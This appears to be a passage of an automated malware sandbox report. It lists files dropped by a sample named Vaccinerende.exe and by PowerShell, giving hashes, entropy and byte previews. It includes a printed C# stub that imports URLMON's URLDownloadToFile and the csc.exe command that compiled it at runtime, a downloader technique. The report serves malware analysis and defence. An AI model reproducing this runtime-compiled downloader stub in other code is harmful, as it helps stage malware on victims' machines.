                                                                            Preview:L....Y.f.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\r4gn3nq1\CSCA7279739985342FFA8B6946FD4222CB8.TMP....................J....`B..[C..........4.......C:\Users\user\AppData\Local\Temp\RESF72C.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.4.g.n.3.n.q.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                            C:\Users\user\AppData\Local\Temp\Vaccinerende.exe

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                            Category:dropped
                                                                            Size (bytes):990768
                                                                            Entropy (8bit):6.298838855552093
                                                                            Encrypted:false
                                                                            SSDEEP:12288:5Ly0W0exb+S7/6eALmQXhts30QmskXnnAEkINz3WSVgl:5Ly05wCmQXw30Ek3AgNz3Sl
                                                                            MD5:450228D72F9F726B645C55BBBC6DB905
                                                                            SHA1:B26075C51A4681F2FF7407188F5E9480545A7ACA
                                                                            SHA-256:9124D7696D2B94E7959933C3F7A8F68E61A5CE29CD5934A4D0379C2193B126BE
                                                                            SHA-512:4795D090447D237CBE1A044FFE78E8CD0C9BE358DF778673B4713EAB2C324056A7701D22B827B95B2413845089FA71AC81A4F47CC8BCDBABAD34845E64B4E090
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...'.uY.................d...*......=3............@.................................7/....@..........................................................................................................................................................text...mb.......d.................. ..`.rdata...............h..............@..@.data................|..............@....ndata...................................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Temp\afcoe331.g4g.psm1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1

                                                                            C:\Users\user\AppData\Local\Temp\ambtf0up.cjv.ps1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1

                                                                            C:\Users\user\AppData\Local\Temp\bhv38BD.tmp

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x22bd091d, page size 32768, DirtyShutdown, Windows version 6.1
                                                                            Category:dropped
                                                                            Size (bytes):21037056
                                                                            Entropy (8bit):1.135593507029044
                                                                            Encrypted:false
                                                                            SSDEEP:24576:L91U91o2I+0mZ5lEHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:L9EXaLuHqqEXwPW+RHA6m1fN
                                                                            MD5:C698A770F47B37D90C65184622219B78
                                                                            SHA1:806C6DAE607CD36EBEF6338439214CF591EE7CE3
                                                                            SHA-256:9A9906A67F8BD549AEA26920296A6FE4534ECD706C11D9BAF46AD7DF7909D2C2
                                                                            SHA-512:0F0F031446F3951B8C61A24F5A3BF747EAF94867DDE9B2794197257911F4237EBE7B9766EFB836C8F09D753D61C97B8DBB7A0E25403DE544BDD86180A51B9EF3
                                                                            Malicious:false
                                                                            Preview:"...... ........................u..............................;:...{...7...|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Temp\bhv6163.tmp

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x22bd091d, page size 32768, DirtyShutdown, Windows version 6.1
                                                                            Category:dropped
                                                                            Size (bytes):21037056
                                                                            Entropy (8bit):1.135593507029044
                                                                            Encrypted:false
                                                                            SSDEEP:24576:L91U91o2I+0mZ5lEHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:L9EXaLuHqqEXwPW+RHA6m1fN
                                                                            MD5:C698A770F47B37D90C65184622219B78
                                                                            SHA1:806C6DAE607CD36EBEF6338439214CF591EE7CE3
                                                                            SHA-256:9A9906A67F8BD549AEA26920296A6FE4534ECD706C11D9BAF46AD7DF7909D2C2
                                                                            SHA-512:0F0F031446F3951B8C61A24F5A3BF747EAF94867DDE9B2794197257911F4237EBE7B9766EFB836C8F09D753D61C97B8DBB7A0E25403DE544BDD86180A51B9EF3
                                                                            Malicious:false
                                                                            Preview:"...... ........................u..............................;:...{...7...|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Temp\bhv70BC.tmp

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x22bd091d, page size 32768, DirtyShutdown, Windows version 6.1
                                                                            Category:dropped
                                                                            Size (bytes):21037056
                                                                            Entropy (8bit):1.13548290037764
                                                                            Encrypted:false
                                                                            SSDEEP:24576:L91U91o2I+0mZ5lEHLeGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:L9EXaLQHqqEXwPW+RHA6m1fN
                                                                            MD5:778EB6EC5F2213033EA80861CE8E7BB3
                                                                            SHA1:DBE5A41153BF9A4720D9119075BEA801BE59E18A
                                                                            SHA-256:FDF7E937316ECA5F5433505A4751D76D7724DDD16ADEBBC0408944F76D170C27
                                                                            SHA-512:CF262D1182948A4A6F7B1F7595BFC4E9A66858B7433B4C4A1E38B8B4CD4A503A52CE76B041029BC82091CE509984AD20B44A0795E6CBF709B48BBB1EA4DD9700
                                                                            Malicious:false
                                                                            Preview:"...... ........................u..............................;:...{...7...|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Temp\bhv874A.tmp

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x22bd091d, page size 32768, DirtyShutdown, Windows version 6.1
                                                                            Category:dropped
                                                                            Size (bytes):21037056
                                                                            Entropy (8bit):1.13548290037764
                                                                            Encrypted:false
                                                                            SSDEEP:24576:L91U91o2I+0mZ5lEHLeGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:L9EXaLQHqqEXwPW+RHA6m1fN
                                                                            MD5:778EB6EC5F2213033EA80861CE8E7BB3
                                                                            SHA1:DBE5A41153BF9A4720D9119075BEA801BE59E18A
                                                                            SHA-256:FDF7E937316ECA5F5433505A4751D76D7724DDD16ADEBBC0408944F76D170C27
                                                                            SHA-512:CF262D1182948A4A6F7B1F7595BFC4E9A66858B7433B4C4A1E38B8B4CD4A503A52CE76B041029BC82091CE509984AD20B44A0795E6CBF709B48BBB1EA4DD9700
                                                                            Malicious:false
                                                                            Preview:"...... ........................u..............................;:...{...7...|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Temp\bhvB54C.tmp

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x22bd091d, page size 32768, DirtyShutdown, Windows version 6.1
                                                                            Category:dropped
                                                                            Size (bytes):21037056
                                                                            Entropy (8bit):1.13548290037764
                                                                            Encrypted:false
                                                                            SSDEEP:24576:L91U91o2I+0mZ5lEHLeGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:L9EXaLQHqqEXwPW+RHA6m1fN
                                                                            MD5:778EB6EC5F2213033EA80861CE8E7BB3
                                                                            SHA1:DBE5A41153BF9A4720D9119075BEA801BE59E18A
                                                                            SHA-256:FDF7E937316ECA5F5433505A4751D76D7724DDD16ADEBBC0408944F76D170C27
                                                                            SHA-512:CF262D1182948A4A6F7B1F7595BFC4E9A66858B7433B4C4A1E38B8B4CD4A503A52CE76B041029BC82091CE509984AD20B44A0795E6CBF709B48BBB1EA4DD9700
                                                                            Malicious:false
                                                                            Preview:"...... ........................u..............................;:...{...7...|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Temp\bhvF162.tmp

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x22bd091d, page size 32768, DirtyShutdown, Windows version 6.1
                                                                            Category:dropped
                                                                            Size (bytes):21037056
                                                                            Entropy (8bit):1.13548290037764
                                                                            Encrypted:false
                                                                            SSDEEP:24576:L91U91o2I+0mZ5lEHLeGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:L9EXaLQHqqEXwPW+RHA6m1fN
                                                                            MD5:778EB6EC5F2213033EA80861CE8E7BB3
                                                                            SHA1:DBE5A41153BF9A4720D9119075BEA801BE59E18A
                                                                            SHA-256:FDF7E937316ECA5F5433505A4751D76D7724DDD16ADEBBC0408944F76D170C27
                                                                            SHA-512:CF262D1182948A4A6F7B1F7595BFC4E9A66858B7433B4C4A1E38B8B4CD4A503A52CE76B041029BC82091CE509984AD20B44A0795E6CBF709B48BBB1EA4DD9700
                                                                            Malicious:false
                                                                            Preview:"...... ........................u..............................;:...{...7...|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Temp\bz5eavq5.fug.psm1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1

                                                                            C:\Users\user\AppData\Local\Temp\ctsuyeuksgddrommozvfphobcmulr

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2
                                                                            Entropy (8bit):1.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:Qn:Qn
                                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                            Malicious:false
                                                                            Preview:..

                                                                            C:\Users\user\AppData\Local\Temp\dalh1k2r.iv5.ps1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1

                                                                            C:\Users\user\AppData\Local\Temp\iwmakfxbvkkvnuhajheo

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2
                                                                            Entropy (8bit):1.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:Qn:Qn
                                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                            Malicious:false
                                                                            Preview:..

                                                                            C:\Users\user\AppData\Local\Temp\jghbahqihjysxfkijlbzkstdovyth

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2
                                                                            Entropy (8bit):1.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:Qn:Qn
                                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                            Malicious:false
                                                                            Preview:..

                                                                            C:\Users\user\AppData\Local\Temp\jypyihgkg

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2
                                                                            Entropy (8bit):1.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:Qn:Qn
                                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                            Malicious:false
                                                                            Preview:..

                                                                            C:\Users\user\AppData\Local\Temp\lpwdliyh.bjz.ps1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1

                                                                            C:\Users\user\AppData\Local\Temp\myrqksteqvbcbpuimnlztpdvy

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2
                                                                            Entropy (8bit):1.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:Qn:Qn
                                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                            Malicious:false
                                                                            Preview:..

                                                                            C:\Users\user\AppData\Local\Temp\ngs2zpei.e4g.ps1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1

                                                                            C:\Users\user\AppData\Local\Temp\r24b1nro.hm0.psm1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1

                                                                            C:\Users\user\AppData\Local\Temp\r4gn3nq1\CSCA7279739985342FFA8B6946FD4222CB8.TMP

                                                                            Download File
                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                            File Type:MSVC .res
                                                                            Category:dropped
                                                                            Size (bytes):652
                                                                            Entropy (8bit):3.0964340758179905
                                                                            Encrypted:false
                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grywak7YnqqmPN5Dlq5J:+RI+ycuZhNOakSmPNnqX
                                                                            MD5:EB7F87B9844A14F70E096042DCF75B43
                                                                            SHA1:8BA60699B026816DCD66AD53549FF3A0E2E661C9
                                                                            SHA-256:5A6EA4849524BF85118B7A98CCE5079646A0FA351AB4A95558F70C2E3868FE3D
                                                                            SHA-512:E0A77741C21F38A4D2E2AEDEE036E8372258845575895A305FE3EB7EEF04BBB7AF5805658957212542778926AEC2CFF5D07060E697556406F0D94EE43F40B2ED
                                                                            Malicious:false
                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.4.g.n.3.n.q.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...r.4.g.n.3.n.q.1...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                            C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.0.cs

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
                                                                            Category:dropped
                                                                            Size (bytes):474
                                                                            Entropy (8bit):3.762186518164636
                                                                            Encrypted:false
                                                                            SSDEEP:6:V/DsYLDS81zuWdxFPMAQXReKJ8SRHy4Hsyb4CUQ/aWQy:V/DTLDfuwuXfHU8cy
                                                                            MD5:ED8B0B366B8FD7BDF35FCDDB6A6FC768
                                                                            SHA1:F333BE6ECEC2AC5315DC3CB28FFE6202E6C3E142
                                                                            SHA-256:F179DBF6F56665E7020A3CF42A5150AED8A15253CCBCF368CDC526C88D90D99B
                                                                            SHA-512:1ACE461D8AF56F8002E38EB8274F86C026ABFBFBD851C93D878D9A211EE727005B98C7236F43E1497C0A654BA45DC87AB6ED3EC49C77B3A3013E771381F523CE
                                                                            Malicious:false
                                                                            Preview:.using System;.using System.Runtime.InteropServices;..namespace IksntLgmSqt.{. public class ss. {. [DllImport("URLMON.Dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr FwwK,string DHAHgBDF,string BHs,uint TW,IntPtr puzamEd);.. }..}.

                                                                            C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.cmdline

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):369
                                                                            Entropy (8bit):5.263210373056614
                                                                            Encrypted:false
                                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23f2WjBUzxs7+AEszIP23f2Wjhx:p37Lvkmb6KzeWCWZEoeWlx
                                                                            MD5:FF3EC694C4D12297CE7E6A79101E6A78
                                                                            SHA1:97BDC2021888BB7E8765E2305D0328E8C33E00F8
                                                                            SHA-256:D60ADD9447B2C8CE42B93265B192B8F30617BC1924CEAF948AC53DC38C1BB18D
                                                                            SHA-512:DB6FB4EE68AF2326EBD56F6918711CC2AF00D04BE0174BFF93F2F6F6C1FF88F32061A1149F6C2217472FA60B5C66C6D6BE0C756BEBE64AD758E15A2FE17B251E
                                                                            Malicious:false
                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.0.cs"

                                                                            C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.dll

                                                                            Download File
                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):3072
                                                                            Entropy (8bit):2.820523402807047
                                                                            Encrypted:false
                                                                            SSDEEP:24:etGScPBG5eM7p8s8SgkCMqza0RPAc4tkZfcWmYTqhkWI+ycuZhNOakSmPNnq:6zsM+DMoa0LJcWmQEH1ulOa3aq
                                                                            MD5:9DFF303FA503DCEE45EA8C9C17A84AA7
                                                                            SHA1:D071D0C438D2BD427F1EBCEC1E6BB8569BCFE0F8
                                                                            SHA-256:232C2D8B81F0FFD198F2F5BEBB0EC016215086CB4D11219BB6DD3C5CF079D942
                                                                            SHA-512:E45F06F1954BD50327C157F40F747DEE6D41FDDA3EE830FBA373A942C33B5E0587FE35BC481CF4E341247FBDBDF92B99CFAB83EDC5EED3A2937FFC996FA6BB7D
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Y.f...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................6./.....r.....r.......................................... =.....P ......O.........U.....Z.....c.....g.....j...O.....O...!.O.....O.......!.....*.......=.......................................&..........<Module>.r4

                                                                            C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.out

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                            Category:modified
                                                                            Size (bytes):866
                                                                            Entropy (8bit):5.3456684169745525
                                                                            Encrypted:false
                                                                            SSDEEP:24:AId3ka6KzJzEoJOKaMD5DqBVKVrdFAMBJTH:Akka60BEo4KdDcVKdBJj
                                                                            MD5:2F342C93B9CB0BC574B2CD6F690B2381
                                                                            SHA1:5E73CB7142CAE4DCFF76445B6CEDD4E42E415011
                                                                            SHA-256:0C6C5B051FB4C6E4AC649FD8470B2F6176C7CBF4222D10D324AA06BD2E62D5E5
                                                                            SHA-512:94D7BB6671B9C58B12B2DC5027925FD97B044434D8492186A5DF7B8A0D38C0404E03D295709BFEF0D3235F021BADDF33FA63F6A60F17CC6C1E5797ED4E655D15
                                                                            Malicious:false
                                                                            Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                            C:\Users\user\AppData\Local\Temp\rgnvwzkt.kw3.psm1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
